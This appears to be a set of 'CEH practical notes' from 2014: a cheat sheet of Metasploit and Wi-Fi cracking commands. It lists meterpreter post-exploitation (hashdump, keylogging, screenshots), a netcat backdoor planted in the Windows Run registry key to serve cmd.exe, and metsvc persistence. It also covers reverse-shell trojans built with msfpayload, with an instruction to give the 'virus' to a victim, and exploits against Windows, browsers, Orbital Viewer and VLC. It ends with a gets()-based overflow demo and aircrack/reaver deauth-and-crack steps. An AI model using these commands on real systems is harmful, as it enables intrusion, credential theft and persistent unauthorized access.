exploit
So we got successful meterpreter session It means u remotely login to xp-os.
now use help command for listing meterpreter commands.
Meterpreter Commands
meterpreter > getuid
meterpreter > ps
meterpreter > migrate 1444 [ migrate to that process which have admin privileges. ]
meterpreter > idletime
meterpreter > hashdump
meterpreter > screenshot
meterpreter > shell
> c:\> net user root *
>c:\> exit
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Uploading Netcat :
meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter > reg enumkry -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
meterpreter > reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\Run -v
NETCAT -d C:\\WINDOWS\\system32\\nc.exe" -L -d -p 1234 -e cmd.exe"
meterpreter > reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
Note : Netcat can be installed in win xp,vista,7 [ Once netcat is installed successfully on victim
os no need to exploit use commands :]
root@bt:~# nc <victim ip> <port>
root@bt:~# nc 192.168.217.141 1234
More Commands :
meterpreter > cat <file name>
meterpreter > download C:\\<file name>
meterpreter > upload C:\\<file name>
meterpreter > searrch -d C:\\ *d
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
meterpreter > uictl disable keybord
meterpreter > uictl enable keybord
meterpreter > run [ press tab show many more commands ]
meterpreter > run vnc
Creating Backdoor :
meterpreter > run metsvc [Maximum Virus And Trojens Work On 31337 Port]
meterpreter > background [ to go back ]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
NOTE : What if our connection break or victim patch his vulnerability to connect with our
"Backdoor" :-
use exploit/multi/handler
set payload/windows/metsvc_bind_tcp
show options
set rhost < victim >
set lport 31337 ---------> because our backdoor is working on 31337 port.
exploit
meterpreter > run
meterpreter >
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
II. Windows Server 2003
Windows Server Hacking [ 2003 SP - 1,2 ]
RCE ( Netapi ) ( Remote Code Execution ) [ windows server 2003 SP-1,2,platinum ]
msfconsole
exploit/windows/smb/ms06_040_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [MY IP ADDRESS]
set RHOST [TARGET IP]
exploit
III. Windows 7
Windows 7 Hacking
(dot)EXE [ Trojan ] [ Hack Any Windows Os ]
root@#~/ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.128 LPORT=4444
x > /root/12345.exe
NOTE : Give 12345.exe [ virus ] to victim
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lhost < Our Ip >
set lport 4444 ---------> because our virus is working on 4444 port
exploit
meterpreter > run
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
IV. Browser Exploits Autopwn [ combo of may exploits ] [See also : Java bean jmx17_jmxbean ]
use auxiliary/server/browser_autopwn
show options
set LHOST <My Ip >
set SRVHOST < My Server is hosted on my computer so again my ip >
set SRVPORT 80
set URIPATH /
exploit
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
V. ARORA Exploit
msf>use exploit/windows/browser/ms10_002_aurora
msf>show options
msf>set URLPATH/
http://192.168.42.131/
msf>show payloads
msf>set payload windows/vncinject/reverse_tcp
msf>show options
msf>set lhost 192.168.17.128
msf>exploit
VI. Windows 8
Attacker 1. start terminal : 2. root@bt:~# msfpayload windows/meterpreter/reverse_tcp Lhost=192.168.17.128
LPORT=4444 x > /root/12345.exe
Now give this 12345.exe <- Virus to victim Then Run, root@bt:~# msfconsole
msf>
msf> use exploit/multi/handler msf> exploit(handler) > set payload windows/meterpreter/reverse_tcp msf> exploit(handler) > show options msf> exploit(handler) > set LHOST 192.168.17.128 msf> exploit(handler) > set LPORT 4444 msf> exploit(handler) > exploit
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
VII. DLL Injection
1. Hack Windows 7 with Metasploit using Kali Linux.
Machine 1: Host Kali Linux Machine
Machine 2: Target Windows 7 Machine
msfconsole
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf > set payload windows/meterpreter/reverse_tcp
msf > show options
msf > set SRVHOST 192.168.31.20
msf > set LHOST 192.168.31.20
msf > exploit
msf > sessions
msf > sessions -i 1
meterpreter >
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Buffer Overflow #include<stdio.h>
void main()
{
char *name;
char *command;
name=(char *)malloc(10);
command=(char *)malloc(128);
printf("address of name is : %d\n",name);
printf("address of command is : %d\n",command);
printf("Difference between address is : %d\n",command-name);
printf("Enter your name");
gets(name);
printf("Hello %s\n",name);
system(command);
}
root@kali:~#
root@kali:~# gcc buffer.c -o buffer
root@kali:~# ./buffer
Eg: Output : 347582347y5823458723453425534523453452345234cat /etc/passwd
1] Buffer Over Flow Attack On orbital_viewer
msfconsole
search bof
search orbital
use exploit/windows/fileformat/orbital_viewer_orb
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST <Our IP>
exploit
exit
Note : Give " msf.orb " to victim now,
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
set lhost < Our Ip >
set lport 4444 ---------> because our virus is working on 4444 port
exploit
meterpreter > run
II. Buffer Overflow In VLC Player
use exploit/windows/fileformat/vlc_modplug_s3m
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST <Our IP>
exploit
exit
Note : Give " msf.s3m " to victim now,
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lhost < Our Ip >
set lport 4444 ---------> because our virus is working on 4444 port
exploit
meterpreter > run
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Wi-Fi Hacking http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
1. WEP / WPA / WPA-2
WEP - Wired Equivalent Privacy
WEP keys are a sequence of hexadecimal digits.
These digits include the numbers 0-9 and the letters A-F.
Some examples of WEP keys are:
1A648C9FE2
99D767BAC38EA23B0C0176D152
The length of a WEP key depends on the type of WEP security (called "encryption")
utilized:
40- or 64-bit WEP: 10 digit key
104- or 128-bit WEP: 26 digit key
256-bit WEP: 58 digit key
WPA-PSK - Wi-Fi Protected Access (Pre-Shared Key) security key
The keys used by WPA are 256-bit, a significant increase over the 64-bit and 128-
bit keys used in the WEP system.
Temporal Key Integrity Protocol - TKIP
TKIP employs a per-packet key system that was radically more secure than fixed
key used in the WEP system.
KIP was later superseded by Advanced Encryption Standard (AES).
WPA2 - Wi-Fi Protected Access II
256-bit encryption
using a security key of either 64 hexadecimal digits or a passphrase of up to 63
ASCII characters.
2. Command Line
airmon-ng -> To Put Your Network adapter in monitor mode.
airodump -ng -> Start monitoring and packets sniffing.
aireplay -ng -> For Deauthanticate the user.
aircrack -ng -> To crack the key.
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
SSID - service set identifier (Name of Network)
BSSID - Base Station service set identifier -> BSSIDs Identify Access Points and Their Clients
(AP MAC Address)
Hacking WEP From Backtrack Linux Terminal
step1 : airmon-ng start wlan0
step2 : airodump-ng mon0
step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0 --> Wait for at least 5000
packet
step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0
For Kali Linux : aireplay-ng -c <STATION or Client> -0 500 -a 0C:D2:B5:01:AB:70 mon0 --
ignore-negative-one
step5 : aircrack-ng lab.cap
Hacking WPA & WPA2 From Backtrack Linux Terminal
step1 : airmon-ng start wlan0
step2 : airodump-ng mon0
step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0
step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0
> wait for at least 1 4-way handshake
> > For Kali Linux : aireplay-ng -c <STATION or client> -0 500 -a 0C:D2:B5:01:AB:70
mon0 --ignore-negative-one
step5 : aircrack-ng -w wordlist lab.cap
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Hacking WPS From Backtrack Linux Terminal
Reaver : [ crack wep-wpa-wpa2 ]
wash -i mon0
[ to se if WPS key is enable or not ( it should be enable) ] means [" wps locked option -- no "]
reaver -i mon0 -b <BSSID> -S --no-nacks -d7 -vv -c 1
NOTE : If u already have pin :
reaver -i mon0(or airoscript if you use fakeMAC) -b (bssid) -vv -c (channel) -e (name of AP) -p
(wps pin)
Graphical Interface Tools For Wi-Fi Hacking
wifite
Gerix Wi-Fi Cracker
Fern Wi-Fi Cracker